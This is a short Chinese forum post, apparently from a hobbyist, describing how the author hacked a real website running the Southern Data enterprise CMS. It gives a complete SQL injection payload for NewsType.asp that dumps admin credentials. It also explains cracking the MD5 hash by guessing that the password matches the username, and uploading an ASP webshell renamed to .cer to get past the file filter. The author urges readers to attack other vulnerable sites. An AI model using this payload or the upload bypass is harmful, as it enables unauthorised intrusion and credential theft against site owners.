日站过程

好吧- -SQL注入检测了也没办法- -无奈的我在这个站逛了逛- -无意间。。。
呵呵- -有办法了，不知道这个后缀有多少人知道
南方数据企业0day漏洞
果断输代码啊NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='

OK= =直接爆账号密码，那个MD5加密代码破解还要钱- -于是我就猜猜账号是否和密码一样，用MD5加密了账号- -结果得到了和密码一样的MD5密文。。。。。所以说啊，要靠运气和头脑啊骚年们！！！想想自己错过了多少唾手可得的站！！！！！！！！
蛋疼的进了后台。

OK= =找到地方上传了~~~~

你妹！！我那就是asp的文件！！！
没办法，改了下后缀，cer看看能上传不

喵哈哈天不绝我！打开看看。。。
打完收工- -提权是个运气和技术双休的活，我没有过多的资本继续写了~~~~sorry拉~~

天天都在贴吧呆着十五字倒很少见